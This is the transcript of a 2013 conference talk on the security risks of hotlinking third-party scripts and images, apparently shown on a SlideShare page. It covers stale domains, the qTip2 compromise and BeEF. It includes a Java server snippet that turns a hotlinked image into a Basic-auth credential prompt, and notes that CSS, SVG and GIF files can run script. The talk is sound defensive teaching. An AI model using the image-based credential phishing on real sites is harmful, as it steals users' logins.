• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Hotlinking is Too Hot for Comfort
 

Hotlinking is Too Hot for Comfort

on

  • 1,459 views

Presentation given at GeekMeet in Stockholm, January 2013. Covers the risks with hotlinking JavaScript and images in your websites.

Presentation given at GeekMeet in Stockholm, January 2013. Covers the risks with hotlinking JavaScript and images in your websites.

Statistics

Views

Total Views
1,459
Views on SlideShare
1,435
Embed Views
24

Actions

Likes
1
Downloads
4
Comments
1

2 Embeds 24

https://twitter.com 23
https://si0.twimg.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

11 of 1 previous next

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Hotlinking is Too Hot for Comfort Hotlinking is Too Hot for Comfort Presentation Transcript

    • Hotlinking is Too Hot for Comfort @johnwilander, GeekMeet Stockholm 2013
    • Hotlinking ==<img src="http://3rdparty.net"><script src="http://3rdparty.net"></script> @johnwilander
    • The Paper."You Are What You Include"by Nikiforakis et alhttp://seclab.cs.ucsb.edu/media/uploads/papers/jsinclusions.pdf @johnwilander
    • Crawled• Alexa Top 10,000• Up to 500 pages per domain• 3,000,000+ pages in total @johnwilander
    • @johnwilander
    • Sites typically hotlink JavaScriptfrom 5-15 remote hosts @johnwilander
    • If I can run a script onyour site or app, what can I do? @johnwilander
    • Browser Exploitation Framework http://beefproject.com/ @johnwilander
    • So, who is able to run scripts on your site? @johnwilander
    • % of Service .js Top AlexaWeb analytics www.google-analytics.com/ga.js 68.37% pagead2.googlesyndication.com/Dynamic Ads 23.87% pagead/show_ads.jsWeb analytics www.google-analytics.com/urchin.js 17.32%Social Networking connect.facebook.net/en_us/all.js 16.82%Social Networking platform.twitter.com/widgets.js 13.87%Social Networking & Web analytics s7.addthis.com/js/250/addthis_widget.js 12.68%Web analytics & Tracking edge.quantserve.com/quant.js 11.98%Market Research b.scorecardresearch.com/beacon.js 10.45%Google Helper Functions www.google.com/jsapi 10.14%Web analytics ssl.google-analytics.com/ga.js 10.12% @johnwilander
    • % of Service .js Top AlexaWeb analytics www.google-analytics.com/ga.js 68.37% pagead2.googlesyndication.com/Dynamic Ads 23.87% pagead/show_ads.jsWeb analytics www.google-analytics.com/urchin.js 17.32%Social Networking connect.facebook.net/en_us/all.js 16.82%Social Networking platform.twitter.com/widgets.js 13.87%Social Networking & Web analytics s7.addthis.com/js/250/addthis_widget.js 12.68%Web analytics & Tracking edge.quantserve.com/quant.js 11.98%Market Research b.scorecardresearch.com/beacon.js 10.45%Google Helper www.google.com/jsapi 10.14%Web analytics ssl.google-analytics.com/ga.js 10.12% @johnwilander
    • % of Service .js Top AlexaWeb analytics www.google-analytics.com/ga.js 68.37% pagead2.googlesyndication.com/Dynamic Ads 23.87% pagead/show_ads.jsWeb analytics www.google-analytics.com/urchin.js 17.32%ga.js and urchin.js are two different versions ofSocial Networking connect.facebook.net/en_us/all.js 16.82%Social Networking platform.twitter.com/widgets.js 13.87%Google Analytics => probably not on the same site.Social Networking & Web analytics s7.addthis.com/js/250/addthis_widget.js 12.68%Web analytics & Tracking edge.quantserve.com/quant.js 11.98%68.37+17.32 ≈ 85% ofb.scorecardresearch.com/beacon.jsMarket Research Alexa Top 10,000 10.45%Google Helper www.google.com/jsapi 10.14%Please dont be evil, Google.Web analytics ssl.google-analytics.com/ga.js 10.12% @johnwilander
    • @johnwilander
    • 2011-12-08 there was an issue reported https://github.com/Craga89/qTip2/issues/286 @johnwilander
    • "sends your browser agent and another piece of info" @johnwilander
    • "old Wordpress install … security vulnerability""infected nearly all JS files on my site" @johnwilander
    • "The offending scripts have been removed as well as the Wordpress blog""cronjob setup that checks for changes" "Closed" @johnwilander
    • Comment "it downloads some other exploits" @johnwilander
    • One month later …https://github.com/Craga89/qTip2/issues/286 @johnwilander
    • "issue is still present" @johnwilander
    • "Looks like the security hole wasntplugged after all" "Please … do not hotlink" "Reopened" @johnwilander
    • "Ive disabled the Wordpress blogon my site" "Closed" @johnwilander
    • Questions on qtip Hack• How many end user PCs were trojanized?• How many passwords stolen?• How many credit card numbers stolen?• How many internet bank logins remote controlled? @johnwilander
    • Stale Hotlink Domains @johnwilander
    • Alexa Top 1,000,000 Hotlinks … Alexa Top 10,000 @johnwilander
    • Alexa Top 1,000,000 Other domains Hotlinks Alexa Top 10,000 @johnwilander
    • Alexa Top 1,000,000 Other domains Stale domains, open for purchase Alexa Top 10,000 @johnwilander
    • The Stale Numbers• +3,000,000 pages crawled• 4,225 hotlinked domains outside Alexa Top 1,000,000• 50 domains stale, i.e. no longer registered @johnwilander
    • Nick et al purchased two of those stale domains @johnwilander
    • Stale domains hbotapadmin.com blogtools.usAlexa Top 10,000 hbo.com goldprice.org @johnwilander
    • Stale domains hbotapadmin.com blogtools.us …Alexa Top 10,000 23 less popular sites hbo.com goldprice.org @johnwilander
    • blogtools hbotapadmin .us .comVisits (15 days) 80,466 4,615 Stale domains hbotapadmin.com blogtools.us … Alexa Top 10,000 23 less popular sites hbo.com goldprice.org @johnwilander
    • blogtools hbotapadmin .us .com Visits (15 days) 80,466 4,615 Stale domains hbotapadmin.comIncluding domains 24 4 blogtools.us Including pages 84 41 … Alexa Top 10,000 23 less popular sites hbo.com goldprice.org @johnwilander
    • The Case of theUnauthorized Image @johnwilander
    • ”Hotlinked images,can they bite me too?” @johnwilander
    • OK, this might be bad<script src="http://3rdparty.net"></script><img src="http://3rdparty.net"> But this? @johnwilander
    • @johnwilander
    • What if Meetup allowedprofile images to be hotlinked? @johnwilander
    • Meanwhile, at theAttacker’s Server … @johnwilander
    • Including images typically looks like thisin a web app project: src/main/webapp/ css/… img/thumb_john.jpg js/… html/…But an attacker could instead resolvethat image URL in code, like this … @johnwilander
    • private static final String IMG_PATH = "/img/thumb_john.jpg";private boolean returnUnauthorized = false;@GET@Path("/thumb_john.jpg")@Produces("image/jpg")public Response getEvilImage(@Context ServletContext context) { if (returnUnauthorized) { return Response.status(Response.Status.UNAUTHORIZED) .header("WWW-Authenticate", "Basic").build(); } else { try { BufferedImage image = ImageIO.read(context.getResourceAsStream(IMG_PATH)); ByteArrayOutputStream outputStream = new ByteArrayOutputStream(); ImageIO.write(image, "jpg", outputStream); byte[] imageData = outputStream.toByteArray(); return Response.ok(imageData).build(); } catch (IOException e) { e.printStackTrace(); return Response.serverError().build(); } }} @johnwilander
    • private static final String IMG_PATH = "/images/thumb_john.jpg";private boolean returnUnauthorized = false;@GET@Path("/thumb_john.jpg")@Produces("image/jpg")public Response getEvilImage(@Context ServletContext context) { if (returnUnauthorized) { return Response.status(Response.Status.UNAUTHORIZED) .header("WWW-Authenticate", "Basic").build(); } else { try { BufferedImage image = … adding some nasty, alternate behavior. ImageIO.read(context.getResourceAsStream(IMG_PATH)); ByteArrayOutputStream outputStream = new ByteArrayOutputStream(); ImageIO.write(image, "jpg", outputStream); byte[] imageData = outputStream.toByteArray(); return Response.ok(imageData).build(); } catch (IOException e) { e.printStackTrace(); return Response.serverError().build(); } }} @johnwilander
    • @johnwilander
    • Now what will John Doe enter? @johnwilander
    • Some more nails for the coffin …• CSS files can execute JavaScript (expressions in IE6-7 and XBL in Firefox)• SVGs can execute JavaScript• Gif files can be edited to become executable JavaScript and HTML @johnwilander